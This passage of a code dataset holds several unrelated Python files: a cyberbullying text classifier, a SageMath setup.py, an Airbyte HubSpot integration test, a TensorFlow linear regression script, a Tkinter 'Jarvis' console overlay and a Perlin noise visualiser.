element in data]\n#==============================================================================\n\n #Turn on TF-IDF\n tfidf = TfidfVectorizer(sublinear_tf=True, min_df=5, norm='l2', encoding='latin-1', ngram_range=(1, 2), stop_words='english')\n tfidf_data = tfidf.fit_transform(data)\n \n#==============================================================================\n# #Turn off TF-IDF\n# count_vectorizer = CountVectorizer(binary='true')\n# data = count_vectorizer.fit_transform(data)\n# tfidf_data = TfidfTransformer(use_idf=False).fit_transform(data)\n#==============================================================================\n\n return tfidf_data, target\n\ndef train_eval(data,target):\n \n #Array to hold the names of the classifiers we are going to test\n names = [\"KNN\", \"SVC\", \"Decision Tree\", \"Random Forest\", \"Bernoulli Naive Bayes\"]\n \n #Array holding the actual classifiers\n classifiers = [\n KNeighborsClassifier(),\n SVC(),\n DecisionTreeClassifier(random_state=107),\n RandomForestClassifier(),\n BernoulliNB()]\n \n #Split the data to have separate test data\n data_train,data_test,target_train,target_test = cross_validation.train_test_split(data,target,test_size=0.2,random_state=43)\n for name, clf in zip(names, classifiers):\n if name == \"SVC\":\n clf = SVC(probability=True, C=1000)\n clf.fit(data_train,target_train)\n predicted = clf.predict(data_test)\n predicted_probs = clf.predict_proba(data_test)[:,1]\n print(\"=================================================================\")\n print(name,\"classifier results\")\n print(\"-----------------------------------------------------------------\")\n #evaluate_model(target_test,predicted)\n print(classification_report(target_test,predicted))\n print(\"The accuracy score is {:.2%}\".format(accuracy_score(target_test,predicted)))\n #Plot precision recall curve\n probas = clf.predict_proba(data_test)\n skplt.metrics.plot_precision_recall_curve(target_test, probas, title=name+\" Precision Recall Curve\", cmap=\"hot\")\n plt.show()\n cnf_matrix = confusion_matrix(target_test,predicted)\n#==============================================================================\n# #This is only used when obtaining raw data for the report, otherwise use the plot\n# print(\"---------------------------\\nConfusion Matrix\\n---------------------------\")\n# print(cnf_matrix)\n#==============================================================================\n #Plot the confusion matrix\n graph_name = (name, \"Confusion Matrix\")\n plot_confusion_matrix(cnf_matrix, classes=['not bullying', 'bullying'],title =graph_name)\n #Plot the ROC curve\n plot_roc_curve(target_test, predicted_probs, name)\n optimized_hyper_parameters(data_train,data_test,target_train,target_test)\n \ndef optimized_hyper_parameters(data_train,data_test,target_train,target_test):\n \n print(\"=================================================================\")\n print(\"Optimized SVC hyper parameters\")\n print(\"-----------------------------------------------------------------\")\n classifier= joblib.load('SVC.pkl')\n #Get classifiers predictions for the test set\n test_predict = classifier.fit(data_train,target_train).predict(data_test)\n predicted_probs = classifier.fit(data_train,target_train).predict_proba(data_test)[:,1]\n print(classification_report(target_test,test_predict))\n print(\"The accuracy score is {:.2%}\".format(accuracy_score(target_test,test_predict)))\n #Plot precision recall curve\n probas = classifier.predict_proba(data_test)\n skplt.metrics.plot_precision_recall_curve(target_test, probas, title=\"SVC Precision Recall Curve\", cmap=\"hot\")\n plt.show()\n #Plot the confusion matrix\n cnf_matrix = confusion_matrix(target_test,test_predict)\n#==============================================================================\n# #This is only used when obtaining raw data for the report, otherwise use the plot\n# print(\"---------------------------\\nConfusion Matrix\\n---------------------------\")\n# print(cnf_matrix)\n#==============================================================================\n graph_name = (\"SVC Confusion Matrix\")\n plot_confusion_matrix(cnf_matrix, classes=['not bullying', 'bullying'],title =graph_name)\n #Plot the ROC curve\n plot_roc_curve(target_test, predicted_probs, \"SVC\")\n print(\"Parameters were: \", classifier.get_params())\n \n print(\"=================================================================\")\n print(\"Optimized Random Forest hyper parameters\")\n print(\"-----------------------------------------------------------------\")\n classifier= joblib.load('random_forest.pkl')\n #Get classifiers predictions for the test set\n test_predict = classifier.fit(data_train,target_train).predict(data_test)\n predicted_probs = classifier.fit(data_train,target_train).predict_proba(data_test)[:,1]\n print(classification_report(target_test,test_predict))\n print(\"The accuracy score is {:.2%}\".format(accuracy_score(target_test,test_predict)))\n #Plot precision recall curve\n probas = classifier.predict_proba(data_test)\n skplt.metrics.plot_precision_recall_curve(target_test, probas, title=\"Random Forest Precision Recall Curve\", cmap=\"hot\")\n plt.show()\n #Plot the confusion matrix\n cnf_matrix = confusion_matrix(target_test,test_predict)\n#==============================================================================\n# #This is only used when obtaining raw data for the report, otherwise use the plot\n# print(\"---------------------------\\nConfusion Matrix\\n---------------------------\")\n# print(cnf_matrix)\n#==============================================================================\n graph_name = (\"Random Forest Confusion Matrix\")\n plot_confusion_matrix(cnf_matrix, classes=['not bullying', 'bullying'],title =graph_name)\n #Plot the ROC curve\n plot_roc_curve(target_test, predicted_probs, \"Random Forest\")\n print(\"Parameters were: \", classifier.get_params())\n\n print(\"=================================================================\")\n print(\"Optimized Decision Tree hyper parameters\")\n print(\"-----------------------------------------------------------------\")\n classifier= joblib.load('d_tree.pkl')\n #Get classifiers predictions for the test set\n test_predict = classifier.fit(data_train,target_train).predict(data_test)\n predicted_probs = classifier.fit(data_train,target_train).predict_proba(data_test)[:,1]\n print(classification_report(target_test,test_predict))\n print(\"The accuracy score is {:.2%}\".format(accuracy_score(target_test,test_predict)))\n #Plot precision recall curve\n probas = classifier.predict_proba(data_test)\n skplt.metrics.plot_precision_recall_curve(target_test, probas, title=\"Decision Tree Precision Recall Curve\", cmap=\"hot\")\n plt.show()\n #Plot the confusion matrix\n cnf_matrix = confusion_matrix(target_test,test_predict)\n#==============================================================================\n# #This is only used when obtaining raw data for the report, otherwise use the plot\n# print(\"---------------------------\\nConfusion Matrix\\n---------------------------\")\n# print(cnf_matrix)\n#==============================================================================\n graph_name = (\"Decision Tree Confusion Matrix\")\n plot_confusion_matrix(cnf_matrix, classes=['not bullying', 'bullying'],title =graph_name)\n #Plot the ROC curve\n plot_roc_curve(target_test, predicted_probs, \"Decision Tree\")\n print(\"Parameters were: \", classifier.get_params())\n\n print(\"=================================================================\")\n print(\"Optimized KNN hyper parameters\")\n print(\"-----------------------------------------------------------------\")\n classifier= joblib.load('KNN.pkl')\n #Get classifiers predictions for the test set\n test_predict = classifier.fit(data_train,target_train).predict(data_test)\n predicted_probs = classifier.fit(data_train,target_train).predict_proba(data_test)[:,1]\n print(classification_report(target_test,test_predict))\n print(\"The accuracy score is {:.2%}\".format(accuracy_score(target_test,test_predict)))\n #Plot precision recall curve\n probas = classifier.predict_proba(data_test)\n skplt.metrics.plot_precision_recall_curve(target_test, probas, title=\"KNN Precision Recall Curve\", cmap=\"hot\")\n plt.show()\n #Plot the confusion matrix\n cnf_matrix = confusion_matrix(target_test,test_predict)\n#==============================================================================\n# #This is only used when obtaining raw data for the report, otherwise use the plot\n# print(\"---------------------------\\nConfusion Matrix\\n---------------------------\")\n# print(cnf_matrix)\n#==============================================================================\n graph_name = (\"KNN Confusion Matrix\")\n plot_confusion_matrix(cnf_matrix, classes=['not bullying', 'bullying'],title =graph_name)\n #Plot the ROC curve\n plot_roc_curve(target_test, predicted_probs, \"KNN\")\n print(\"Parameters were: \", classifier.get_params())\n \n \ndef main():\n #Set background colour for plots\n plt.rcParams['axes.facecolor'] = '#F9FFFD'\n #Get a start time for the program\n start_time = time.time()\n #load and preprocess datasets\n tf_idf, target = preprocess()\n #train classifiers on datasets & hyperoptimize\n train_eval(tf_idf,target)\n \n #Get the time taken in seconds\n print(\"\\n=================================================================\")\n print(\"Program ran in %s seconds\" % (time.time() - start_time))\n print(\"=================================================================\\n\")\n \n \nmain()","sub_path":"Xu_Jun_Zhu_Bellmore/XJZB_load_pkl.py","file_name":"XJZB_load_pkl.py","file_ext":"py","file_size_in_byte":15884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"448189435","text":"## -*- encoding: utf-8 -*-\n\"\"\"\nSageMath package for computing various moduli spaces invariants.\n\"\"\"\n\nimport os\nimport sys\nfrom setuptools import setup\nfrom setuptools.command.test import test as TestCommand\nfrom codecs import open\n\n# Get information from separate files (README, VERSION)\ndef readfile(filename):\n with open(filename, encoding='utf-8') as f:\n return f.read()\n\n# For the tests\nclass SageTest(TestCommand):\n def run_tests(self):\n errno = os.system(\"sage -t --force-lib msinvar\")\n sys.exit(errno)\n\nsetup(\n name = 'msinvar',\n version = '0.1',\n description='SageMath package for computing various moduli spaces invariants',\n long_description = readfile(\"README.rst\"),\n # long_description = readfile(\"README.md\"),\n # long_description_content_type=\"text/markdown\",\n url='https://github.com/smzg/msinvar',\n author='Sergey Mozgovoy',\n author_email='mozhov@gmail.com',\n license='GPLv2+',\n classifiers=[\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Science/Research',\n 'Topic :: Software Development :: Build Tools',\n 'Topic :: Scientific/Engineering :: Mathematics',\n 'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)',\n 'Programming Language :: Python :: 3.7',\n ],\n keywords = 'SageMath moduli spaces invariants',\n packages = ['msinvar'],\n install_requires = [],\n cmdclass = {'test': SageTest}, # adding a special setup command for tests\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"525402303","text":"# MIT License\n#\n# Copyright (c) 2020 Airbyte\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\nimport json\nfrom pathlib import Path\nfrom typing import Any, Iterable, List, Mapping, MutableMapping, Tuple\n\nimport pytest\nfrom airbyte_protocol import ConfiguredAirbyteCatalog, SyncMode, Type\nfrom base_python import AirbyteLogger\nfrom source_hubspot.source import SourceHubspot\n\nHERE = Path(__file__).parent.absolute()\n\n\n@pytest.fixture(scope=\"session\", name=\"config\")\ndef config_fixture() -> Mapping[str, Any]:\n config_filename = HERE.parent / \"secrets\" / \"config.json\"\n\n if not config_filename.exists():\n raise RuntimeError(f\"Please provide config in {config_filename}\")\n\n with open(str(config_filename)) as json_file:\n return json.load(json_file)\n\n\n@pytest.fixture\ndef configured_catalog() -> ConfiguredAirbyteCatalog:\n catalog_filename = HERE.parent / \"sample_files\" / \"configured_catalog.json\"\n if not catalog_filename.exists():\n raise RuntimeError(f\"Please provide configured catalog in {catalog_filename}\")\n\n return ConfiguredAirbyteCatalog.parse_file(catalog_filename)\n\n\n@pytest.fixture\ndef configured_catalog_with_incremental(configured_catalog) -> ConfiguredAirbyteCatalog:\n streams = []\n for stream in configured_catalog.streams:\n if SyncMode.incremental in stream.stream.supported_sync_modes:\n stream.sync_mode = SyncMode.incremental\n streams.append(stream)\n\n configured_catalog.streams = streams\n return configured_catalog\n\n\ndef read_stream(\n source: SourceHubspot, config: Mapping, catalog: ConfiguredAirbyteCatalog, state: MutableMapping = None\n) -> Tuple[Mapping, List]:\n records = {}\n states = []\n for message in source.read(AirbyteLogger(), config, catalog, state):\n if message.type == Type.RECORD:\n records.setdefault(message.record.stream, [])\n records[message.record.stream].append(message.record)\n elif message.type == Type.STATE:\n states.append(message.state)\n\n return records, states\n\n\ndef records_older(records: Iterable, than: int, cursor_field: str) -> Iterable:\n for record in records:\n if record.data.get(cursor_field) < than:\n yield record\n\n\nclass TestIncrementalSync:\n def test_sync_with_latest_state(self, config, configured_catalog_with_incremental):\n \"\"\"Sync first time, save the state and sync second time with saved state from previous sync\"\"\"\n streams = {stream.stream.name: stream for stream in configured_catalog_with_incremental.streams}\n records1, states1 = read_stream(SourceHubspot(), config, configured_catalog_with_incremental)\n\n assert states1, \"should have at least one state emitted\"\n assert records1, \"should have at least few records emitted\"\n\n records2, states2 = read_stream(SourceHubspot(), config, configured_catalog_with_incremental, states1[-1].data)\n\n assert states1[-1] == states2[-1], \"final states should be the same\"\n for stream_name, state in states2[-1].data.items():\n cursor_field = streams[stream_name].cursor_field[0]\n old_records1 = records_older(records1[stream_name], than=records2[stream_name][0].data[cursor_field], cursor_field=cursor_field)\n old_records2 = records_older(records2[stream_name], than=records2[stream_name][0].data[cursor_field], cursor_field=cursor_field)\n assert list(old_records1), \"should have older records from the first read\"\n assert not list(old_records2), \"should not have older records from the second read\"\n","sub_path":"airbyte-integrations/connectors/source-hubspot/integration_tests/incremental_test.py","file_name":"incremental_test.py","file_ext":"py","file_size_in_byte":4587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"382494172","text":"from __future__ import print_function\n\nimport sys\nimport tensorflow as tf\nimport numpy\nimport matplotlib.pyplot as plt\nrng = numpy.random\n\n# # Input array of X values\n# X_array = map(float, raw_input().split())\n\n# Parameters\nlearning_rate = 0.001\ndisplay_step = 10\ntraining_epochs = 100\n\n# Training Data\ntrain_X = numpy.asarray([3.3,4.4,5.5,6.71,6.93,4.168,9.779,6.182,7.59,2.167,\n 7.042,10.791,5.313,7.997,5.654,9.27,3.1, 11.5, 8.5, 9.4, 2.02])\ntrain_Y = numpy.asarray([1.7,2.76,2.09,3.19,1.694,1.573,3.366,2.596,2.53,1.221,\n 2.827,3.465,1.65,2.904,2.42,2.94,1.3, 3.99, 3.48, 3.25, 1.08])\nn_sample = train_X.shape[0]\n# tf Graph Input\nX = tf.placeholder(\"float\", name='X', shape=[])\nY = tf.placeholder(\"float\", name='Y', shape=[])\n# Set model weights\nW = tf.Variable(rng.randn(), name='weights')\nb = tf.Variable(rng.randn(), name='bias')\n# Construct a linear model\npred = tf.add(tf.multiply(X, W), b)\n# Mean squared error\ncost = tf.divide(tf.reduce_sum(tf.pow(pred-Y, 2)), tf.to_float(2*n_sample), name='divide')\n# Gradient descent\n# Note, minimize() knows to modify W and b because Variable objects are trainable=True by default\noptimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)\n# Initialize the variables (i.e. assign their default value)\n# saver = tf.train.Saver()\n# Start training\nwith tf.Session() as sess:\n # Run the initializer\n sess.run(tf.global_variables_initializer())\n \n tf.train.write_graph(sess.graph, '.',\n 'lin_reg.pb', as_text=False)\n # writer = tf.summary.FileWriter(\"linear_regression_model_graph\", sess.graph)\n # Fit all training data\n for epoch in range(training_epochs):\n for (x, y) in zip(train_X, train_Y):\n total_loss = 0\n _, loss = sess.run([optimizer, cost], feed_dict={X: x, Y: y})\n # total_loss += loss\n if epoch % display_step == 0:\n print('Epoch #{0}: {1}'.format(epoch, loss))\n\n # Display logs per epoch step\n # if (epoch+1) % display_step == 0:\n # c = sess.run(cost, feed_dict={X: train_X, Y:train_Y})\n # print(\"Epoch:\", '%04d' % (epoch+1), \"cost=\", \"{:.9f}\".format(c), \\\n # \"W=\", sess.run(W), \"b=\", sess.run(b))\n\n # print(\"Optimization Finished!\")\n # training_cost = sess.run(cost, feed_dict={X: train_X, Y: train_Y})\n # print(\"Training cost=\",training_cost, \"W=\",sess.run(W), \"b=\",sess.run(b), '\\n')\n\n # save_path = saver.save(sess, './my-model')\n # print(\"Model saved in path: %s\" % save_path)\n # saver = tf.train.import_meta_graph('./my-model.meta')\n # saver.restore(sess, tf.train.latest_checkpoint('./'))\n # outputTensors = sess.run(outputOps, feed_dict=feedDict)\n\n # # for index in range(len(X_array)):\n # X_value = X_array[index]\n # Y_value = tf.add(tf.multiply(W,X_value),b)\n # print(\"X value:\", X_value, \"Y value:\", sess.run(Y_value))\n\n\t# Graphic display\n plt.plot(train_X, train_Y, 'ro', label=\"Original Data\")\n plt.plot(train_X, sess.run(W) * train_X + sess.run(b), label='Fitted line')\n plt.legend()\n plt.show()\n\n # writer.close()\n # 2.35 3.22 3.05 2.85 4.55 4.32 1.35\n # # Testing example, as requested (Issue #2)\n # test_X = numpy.asarray([6.83, 4.668, 8.9, 7.91, 5.7, 8.7, 3.1, 2.1])\n # test_Y = numpy.asarray([1.84, 2.273, 3.2, 2.831, 2.92, 3.24, 1.35, 1.03])\n\n # print(\"Testing... (Mean square loss Comparison)\")\n # testing_cost = sess.run(\n # tf.reduce_sum(tf.pow(pred - Y, 2)) / (2 * test_X.shape[0]),\n # feed_dict={X: test_X, Y: test_Y}) # same function as cost above\n # print(\"Testing cost=\", testing_cost)\n # print(\"Absolute mean square loss difference:\", abs(\n # training_cost - testing_cost))\n\n # plt.plot(test_X, test_Y, 'bo', label='Testing data')\n # plt.plot(train_X, sess.run(W) * train_X + sess.run(b), label='Fitted line')\n # plt.legend()\n # plt.show()\n\n\n\n","sub_path":"Linear Regression Model/LRM1/linear_regression_model.py","file_name":"linear_regression_model.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"278699489","text":"import keyboard\nimport tkinter as tk\nfrom PIL import ImageTk, Image\nimport os\nfrom PIL import Image\n\n\"\"\"!! In Menu class from tkinter, add this line in unpost function : if hasattr(self.master, 'unfocus_allowed'): self.master.unfocus_allowed = True\"\"\"\n\nclass Tkinter_window(tk.Tk):\n def __init__(self, jarvis, auto_unfocus=True):\n tk.Tk.__init__(self)\n self.path = os.path.dirname(os.path.abspath(__file__))\n self.auto_unfocus = auto_unfocus\n self.jarvis = jarvis\n self.x, self.y = 1065, 240\n self.length, self.height = 200, 200\n self.bg_opacity = 0.7\n self.geometry(\"{}x{}+{}+{}\".format(str(self.length), str(self.height), str(self.x), str(self.y)))\n self.bg, self.fg = 'grey1', 'white'\n self.configure(bg=self.bg)\n self.image = tk.PhotoImage(file=f'{self.path[:-17]}/Ressources/jarvis_icon.png').subsample(30, 30)\n icon = tk.Label(self, image=self.image, bd=0)\n icon.image = self.image\n\n im = Image.open(f'{self.path[:-17]}/Ressources/jarvis_icon.png')\n print(im.mode)\n\n\n icon.place(x=10, y=10)\n self.labels_counter = -1\n self.title = Tkinter_label(self, 'Jarvis Console', x=50, y=26, fg='dodger blue', bold=True, size=11)\n self.labels = []\n self.important_messages = []\n self.define_menu()\n self.hidden, self.dragged, self.unfocus_allowed, self.last_loop_state = False, False, True, False\n self.add_label(text='Je me réveille...')\n\n self.bind('', self.popup_menu)\n self.bind('', self.press_click)\n self.bind('', self.release_click)\n if self.auto_unfocus: self.bind('', self.unfocus)\n self.bind(\"\", self.drag)\n self.bind('C', self.jarvis.kill)\n self.bind('', self.jarvis.kill)\n self.bind('A', self.add_label)\n self.attributes('-alpha', self.bg_opacity)\n self.overrideredirect(True)\n self.refresh()\n\n def refresh(self):\n try:\n if keyboard.is_pressed('ctrl+maj+h'):\n if self.last_loop_state == None:\n self.hide_unhide()\n self.last_loop_state = 'hidden'\n else: self.last_loop_state = None\n\n self.attributes(\"-topmost\", True)\n self.update()\n except: pass\n\n def define_menu(self):\n self.menu = tk.Menu(self, tearoff=0)\n self.menu.add_command(label='Hide', command=self.hide_unhide)\n self.menu.add_command(label='Clear', command=self.clear)\n self.menu.add_command(label='Change color', command=self.change_color)\n self.menu.add_command(label='Change opacity', command=self.change_opacity)\n self.menu.add_command(label='Kill Jarvis', command=self.jarvis.kill)\n\n def popup_menu(self, event):\n self.unfocus_allowed = False\n self.menu.post(event.x_root, event.y_root)\n\n def hide_unhide(self, *args):\n self.unfocus_allowed = True\n if self.hidden:\n self.x, self.y, self.height, self.hidden = self.winfo_x() - 175, self.winfo_y(), self.height + 150, False\n self.menu.entryconfigure(0, label=\"Hide\")\n else:\n self.x, self.y, self.height, self.hidden = 1240, self.winfo_y(), self.height - 150, True\n self.menu.entryconfigure(0, label=\"Unhide\")\n self.geometry(\"{}x{}+{}+{}\".format(str(self.length), str(self.height), str(self.x), str(self.y)))\n\n def unfocus(self, *args):\n if self.unfocus_allowed:\n keyboard.press('alt')\n keyboard.press('tab')\n keyboard.release('alt')\n keyboard.release('tab')\n\n def press_click(self, event):\n self.x = event.x\n self.y = event.y\n\n def release_click(self, event):\n if self.hidden and not self.dragged:\n self.hide_unhide()\n else: self.x, self.y = self.winfo_x(), self.winfo_y()\n self.dragged = False\n self.geometry(\"{}x{}+{}+{}\".format(str(self.length), str(self.height), str(self.x), str(self.y)))\n if self.auto_unfocus: self.unfocus('event')\n\n def drag(self, event):\n self.dragged = True\n deltay = event.y - self.y\n y = self.winfo_y() + deltay\n if not self.hidden:\n deltax = event.x - self.x\n x = self.winfo_x() + deltax\n else:\n x = self.winfo_x()\n self.geometry(f\"+{x}+{y}\")\n\n def add_label(self, *args, text='test', type='normal'):\n if type == 'error': color = 'red'\n elif type == 'warning': color = 'orange'\n elif type == 'arduino': color = 'dodger blue'\n else: color = self.fg\n if self.labels_counter <= 7:\n if len(text)<27: self.labels.append(Tkinter_label(self, text, fg=color, type=type))\n else:\n self.labels.append(Tkinter_label(self, text[:28], fg=color, type=type))\n self.labels.append(Tkinter_label(self, text[28:], fg=color, type=type))\n else:\n cut = self.labels[0]\n if cut['bg'] == 'red' or cut['bg'] == 'orange': self.important_messages.append(cut['text'])\n cut.destroy()\n self.labels.pop(0)\n self.labels_counter -= 1\n for label in self.labels :\n label.y = label.y-18\n label.place(x=label.x, y=label.y)\n self.labels.append(Tkinter_label(self, text, fg=color, type=type))\n\n self.refresh()\n\n def clear(self):\n self.unfocus_allowed = True\n n = len(self.labels)\n for i in range(n):\n self.labels[0].destroy()\n self.labels.pop(0)\n self.labels_counter = 0\n\n def change_color(self):\n Tkinter_scale(self, type='color')\n\n def change_opacity(self):\n Tkinter_scale(self, type='opacity')\n\n def kill(self, *args):\n try: self.destroy()\n except: pass\n\n\nclass Tkinter_label(tk.Label):\n def __init__(self, app, text, x=10, y=45, fg=None, bg=None, size=10, bold=False, type='normal'):\n tk.Label.__init__(self, app)\n self.app = app\n self.type = type\n if bg == None: bg = self.app.bg\n if fg == None: fg = self.app.fg\n if bold: bold='bold'\n elif not bold: bold=''\n self.x, self.y = x, y+18*self.app.labels_counter\n self.fg, self.bg, self.text = fg, bg, text\n self.config(text=self.text, fg=self.fg, bg=self.bg, font=f'monospace {size} {bold}')\n self.place(x=self.x, y=self.y)\n self.app.labels_counter += 1\n\n\nclass Tkinter_scale(tk.Scale):\n def __init__(self, app, type):\n tk.Scale.__init__(self, app)\n self.app = app\n bg_num = int(''.join([i for i in list(self.app.bg) if i.isdigit()]))\n fg = 'grey'+str(int(100-bg_num))\n if type == 'color':\n self.set(bg_num)\n command = self.send_color_value\n elif type == 'opacity':\n self.set(self.app.bg_opacity*100)\n command = self.send_opacity_value\n self.config(orient='horizontal', from_=0, to=99, cursor='hand2', font='monospace 10',\n resolution=2, length=185,\n bg=self.app.bg, fg=fg, troughcolor=self.app.bg, command=command)\n self.bind('', self.kill)\n self.app.unbind('')\n self.app.unbind('')\n self.app.unbind(\"\")\n self.app.unfocus_allowed = False\n self.place(x=5, y=150)\n\n def send_color_value(self, value):\n value = int(value)\n self.app.bg = f'grey{value}'\n self.app.configure(bg=self.app.bg)\n self.app.title.config(bg=self.app.bg)\n bg_num = int(''.join([i for i in list(self.app.bg) if i.isdigit()]))\n self.app.fg = 'grey'+str(int(100-bg_num))\n self.config(bg=self.app.bg, fg=self.app.fg, troughcolor=self.app.bg)\n for label in self.app.labels:\n label.config(bg=self.app.bg)\n if label.type == 'normal': label.config(fg=self.app.fg)\n\n def send_opacity_value(self, value):\n self.app.bg_opacity = int(value)/100\n self.app.attributes('-alpha', self.app.bg_opacity)\n\n def kill(self, event):\n self.app.bind('', self.app.press_click)\n self.app.bind('', self.app.release_click)\n self.app.bind(\"\", self.app.drag)\n self.app.unfocus_allowed = True\n if self.app.auto_unfocus: self.app.unfocus()\n self.destroy()\n","sub_path":"normal version/with_joystick/v2/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":8555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"482708723","text":"import tkinter as tk\r\nimport math\r\nimport view\r\nimport random\r\n\r\n\r\nclass PerlinNoise(object):\r\n \"\"\"Object that represents properties of the perlin noise to be drawn\"\"\"\r\n\r\n def __init__(self, master):\r\n\r\n self._master = master\r\n self._scaling_factor = 2\r\n self._seed_length = 256\r\n self._octave_count = 8\r\n self._seed = [random.random() for i in range(int(self._seed_length))]\r\n self._generations = []\r\n self.generate_octaves()\r\n\r\n def generate_seed(self):\r\n '''\r\n Function that generates a new seed\r\n '''\r\n self._seed = [random.random() for i in range(int(self._seed_length))]\r\n\r\n def get_seed(self):\r\n '''\r\n Getter function that returns seed length\r\n '''\r\n return self._seed\r\n\r\n def change_octave_count(self, change):\r\n '''\r\n Function that changes octave count\r\n '''\r\n if change == 1:\r\n if 2**self._octave_count < self._seed_length:\r\n self._octave_count += 1\r\n return True\r\n else:\r\n if self._octave_count > 1:\r\n self._octave_count -= 1\r\n return True\r\n return False\r\n\r\n def change_scaling_factor(self, change):\r\n '''\r\n Function that changes scaling factor\r\n '''\r\n if change == 1:\r\n if self._scaling_factor + 0.1 <= 3.5:\r\n self._scaling_factor += 0.1\r\n else:\r\n if self._scaling_factor - 0.1 >= 0.5:\r\n self._scaling_factor -= 0.1\r\n\r\n def change_seed_length(self, change):\r\n '''\r\n Function that changes seed length\r\n '''\r\n if change == 1:\r\n self._seed_length *= 2\r\n self.generate_seed()\r\n else:\r\n if self._seed_length/2 > 1:\r\n self._seed_length /= 2\r\n self.generate_seed()\r\n\r\n def get_octave_count(self):\r\n '''\r\n Getter function that returns octave count\r\n '''\r\n return int(self._octave_count)\r\n\r\n def get_seed_length(self):\r\n '''\r\n Getter function that returns seed length\r\n '''\r\n return int(self._seed_length)\r\n\r\n def get_scaling_factor(self):\r\n '''\r\n Getter function that returns seed length\r\n '''\r\n return self._scaling_factor\r\n\r\n def generate_octaves(self):\r\n '''\r\n Function that generates all octaves\r\n '''\r\n self._generations = []\r\n total_octaves = int(math.log10(self.get_seed_length())/math.log10(2))\r\n scale_acc = 0\r\n scale = 1\r\n for i in range(total_octaves):\r\n scale_acc += 1/(self.get_scaling_factor()**i)\r\n\r\n # Create octaves\r\n for octave in range(total_octaves):\r\n current_gen = []\r\n pitch = int(self.get_seed_length() / 2**(octave))\r\n for x in range(self.get_seed_length()):\r\n sample1 = int(int((x / pitch)) * pitch)\r\n sample2 = int(int((sample1 + pitch)) % self.get_seed_length())\r\n\r\n pos = (x-sample1) / pitch\r\n sample = (1-pos) * \\\r\n self._seed[sample1] + pos * self._seed[sample2]\r\n\r\n noise = sample * scale\r\n if octave != 0:\r\n current_gen.append(self._generations[-1][x] + noise)\r\n else:\r\n current_gen.append(noise)\r\n self._generations.append(current_gen)\r\n scale /= self._scaling_factor\r\n\r\n # Scale between 0 and 1\r\n self._generations = [[i/scale_acc for i in octave]\r\n for octave in self._generations]\r\n\r\n def get_octaves(self):\r\n '''\r\n Getter function that returns generated octaves\r\n '''\r\n return self._generations\r\n\r\n\r\nclass App(object):\r\n '''\r\n Top-level GUI application for PerlinNoiseVisualiser app\r\n '''\r\n\r\n def __init__(self, master, width, height):\r\n '''\r\n Construct PerlinNoiseVisualiser app in root window\r\n\r\n Arguments:\r\n master {tk.Tk} -- Window to place the game into\r\n '''\r\n\r\n self._master = master\r\n self._canvas = tk.Canvas(self._master)\r\n self._canvas.pack()\r\n self._perlin_noise = PerlinNoise(self._master)\r\n self._view = view.AppView(\r\n self._canvas, width, height)\r\n self._view.pack()\r\n self._canvas.bind_all(\"\", self._callback)\r\n self._setup()\r\n\r\n def _setup(self):\r\n '''Function that sets up the display for a Perlin Noise object\r\n '''\r\n self._view.refresh_view(self._perlin_noise)\r\n\r\n def _callback(self, event):\r\n if event.keysym == \"space\":\r\n self._perlin_noise.generate_seed()\r\n self._refresh_seed()\r\n self._perlin_noise.generate_octaves()\r\n self._refresh_terrain()\r\n elif event.keysym == \"u\":\r\n if self._perlin_noise.change_octave_count(1):\r\n print(\"change 1\")\r\n self._view.refresh_octaves(\r\n self._perlin_noise.get_seed_length(), self._perlin_noise.get_octaves(), self._perlin_noise.get_octave_count(), 1)\r\n elif event.keysym == \"j\":\r\n if self._perlin_noise.change_octave_count(-1):\r\n print(\"change -1\")\r\n self._view.refresh_octaves(\r\n self._perlin_noise.get_seed_length(), self._perlin_noise.get_octaves(), self._perlin_noise.get_octave_count(), -1)\r\n elif event.keysym == \"i\":\r\n self._perlin_noise.change_seed_length(1)\r\n self._refresh_seed()\r\n self._perlin_noise.change_octave_count(1)\r\n self._perlin_noise.generate_octaves()\r\n self._refresh_terrain()\r\n elif event.keysym == \"k\":\r\n self._perlin_noise.change_seed_length(-1)\r\n self._refresh_seed()\r\n self._perlin_noise.change_octave_count(-1)\r\n self._perlin_noise.generate_octaves()\r\n self._refresh_terrain()\r\n elif event.keysym == \"o\":\r\n self._perlin_noise.change_scaling_factor(1)\r\n self._perlin_noise.generate_octaves()\r\n self._refresh_terrain()\r\n elif event.keysym == \"l\":\r\n self._perlin_noise.change_scaling_factor(-1)\r\n self._perlin_noise.generate_octaves()\r\n self._refresh_terrain()\r\n\r\n def _refresh_terrain(self):\r\n self._view.draw_terrain(\r\n self._perlin_noise.get_seed_length(), self._perlin_noise.get_octaves(), self._perlin_noise.get_octave_count())\r\n\r\n def 